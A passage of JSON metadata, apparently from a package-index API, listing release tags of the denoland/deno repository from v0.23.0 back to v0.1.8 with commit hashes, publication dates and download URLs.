gz/v0.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0/manifests"},{"name":"v0.22.0","sha":"71efe6f2c530d1cb9e8a2679f5778e2c034a9d0d","kind":"commit","published_at":"2019-10-28T18:12:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"4e88ba9a114279b3969d5ccca1cca0f74c8fc1fd","kind":"commit","published_at":"2019-10-19T22:46:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0/manifests"},{"name":"v0.20.0","sha":"a4b27db21a10f9913460c054c98fce59f3dd157d","kind":"commit","published_at":"2019-10-07T16:57:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0/manifests"},{"name":"v0.19.0","sha":"3892cf59018acd71dd4bc1099d747bd683cd4118","kind":"commit","published_at":"2019-09-25T14:58:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0/manifests"},{"name":"v0.18.0","sha":"7e3296dad92cee2e8b77baedfbeca38aa297928e","kind":"commit","published_at":"2019-09-13T20:40:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0/manifests"},{"name":"v0.17.0","sha":"82588ec09c199683cff88097e1b90649497239c7","kind":"commit","published_at":"2019-09-04T21:15:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"0809b06a3938868f364f1343b0de4d5d9686495d","kind":"tag","published_at":"2019-08-22T22:12:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"58f0e9b9b1b53ca486ef38ae662b98cbde839248","kind":"commit","published_at":"2019-08-13T22:35:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"83d5362f1d7d8589b862de57912135067a8278c7","kind":"tag","published_at":"2019-08-09T01:48:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0/manifests"},{"name":"v0.13.0","sha":"b3541c38f5672ffb4a29d66dca19d88b9ecae478","kind":"commit","published_at":"2019-07-31T19:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0/manifests"},{"name":"v0.12.0","sha":"4e248ecda9bb31478c6db7f5e76fa12b64b516a9","kind":"tag","published_at":"2019-07-16T20:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0/manifests"},{"name":"v0.11.0","sha":"92ac616708cb067a1b895283913c5ecd25c6d873","kind":"tag","published_at":"2019-07-07T16:19:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0/manifests"},{"name":"v0.10.0","sha":"c56df45355c8e68eabbfa62021e7ca7484115c0b","kind":"tag","published_at":"2019-06-25T14:11:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0/manifests"},{"name":"v0.9.0","sha":"7b06aa37342c021f9f1fac99125847d134e67001","kind":"commit","published_at":"2019-06-15T16:04:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0/manifests"},{"name":"v0.8.0","sha":"d60bdb6350f2583e35d020f6cebb6aa30262fbcc","kind":"commit","published_at":"2019-06-08T19:16:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0/manifests"},{"name":"v0.7.0","sha":"5265bd7cb1f86af99b01d73c537d52a50df95fe2","kind":"commit","published_at":"2019-05-29T22:42:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0/manifests"},{"name":"v0.6.0","sha":"22feb74ba12215597416b5531f8a557302283e79","kind":"commit","published_at":"2019-05-20T19:22:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0/manifests"},{"name":"v0.5.0","sha":"23aca36d52220efbfbc07abbe165bd2c9ade2009","kind":"commit","published_at":"2019-05-11T21:19:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0/manifests"},{"name":"v0.4.0","sha":"2aae09c2b869bf5d0bc5fd269464e8ac504528ea","kind":"commit","published_at":"2019-05-03T23:33:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0/manifests"},{"name":"v0.3.11","sha":"3b1e2f1ad42cfebb6f2568e54c82c5ac3c8fe3d4","kind":"commit","published_at":"2019-05-03T22:05:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11/manifests"},{"name":"v0.3.10","sha":"40d8ef1ec9f5e50017c41af8bf3b9f8454f97544","kind":"tag","published_at":"2019-04-25T20:00:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10/manifests"},{"name":"v0.3.9","sha":"e725b26b289fbe96b679039ba4203f10f7229ab9","kind":"tag","published_at":"2019-04-25T15:46:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9/manifests"},{"name":"v0.3.8","sha":"0796a8f2f75005df95ef6115a4bdf6dd66e58dc3","kind":"commit","published_at":"2019-04-19T15:41:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"8584d80cfd26111825af5a69fc6ae4c367ad0700","kind":"commit","published_at":"2019-04-11T19:35:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"744e56cb58f90acde7baf8811676021fb55b2f2a","kind":"tag","published_at":"2019-04-04T14:04:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"b965c7ab367a417fb7bdde2eaf38312179e5c183","kind":"commit","published_at":"2019-03-28T20:58:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"223a2adbb46cb33e75ffe861ecaff6ff7e6d555e","kind":"commit","published_at":"2019-03-20T22:54:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"3dbb06e699398549e8cfabc896ef3256ab433cba","kind":"tag","published_at":"2019-03-13T18:16:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"535037b519711d238dc0bfa2c4d2ffb4b17dec53","kind":"commit","published_at":"2019-03-07T02:22:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"b0c7b54f692ecc866d4f70bfa384631523bbf924","kind":"commit","published_at":"2019-02-27T21:20:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"a5720d9e28f7ee5868049504816405392c2821d7","kind":"commit","published_at":"2019-02-19T04:22:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0/manifests"},{"name":"v0.2.11","sha":"b2fb8261e700c75cfb9a626ae57bbd3098e08454","kind":"commit","published_at":"2019-02-09T04:34:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11/manifests"},{"name":"v0.2.10","sha":"c3241822522fb2b13792fe5666596888057cf829","kind":"commit","published_at":"2019-02-02T23:26:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10/manifests"},{"name":"v0.2.9","sha":"1681bda14d1552860645e40f91f667accefe50cb","kind":"commit","published_at":"2019-01-30T03:57:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9/manifests"},{"name":"v0.2.8","sha":"a47d545e4d0831713d0107e86cead7b4506a9bf6","kind":"commit","published_at":"2019-01-19T16:54:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8/manifests"},{"name":"v0.2.7","sha":"eb4a19ef6ef1c5ae797fb515c45627deca65cf31","kind":"commit","published_at":"2019-01-15T01:25:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7/manifests"},{"name":"v0.2.6","sha":"404e6f86345216c9205cabb88b19eaca762095e0","kind":"commit","published_at":"2019-01-07T22:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"320577c131c8058ba0065f26119ce1ce18bc23d2","kind":"commit","published_at":"2019-01-01T19:30:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"c6e2fffc1388cdb4411d6c2cff36c4febb7c75d5","kind":"commit","published_at":"2018-12-24T04:39:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"c69d2f554d05ba9e4d09af6ae451ce5676876e61","kind":"commit","published_at":"2018-12-14T20:11:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"e6121762f8bf3c531c4c60229ff4a156ae21d931","kind":"commit","published_at":"2018-12-07T22:44:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"b5c6bfa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-01T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name":"v0.1.10","sha":"da959e8c878382ce3417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id"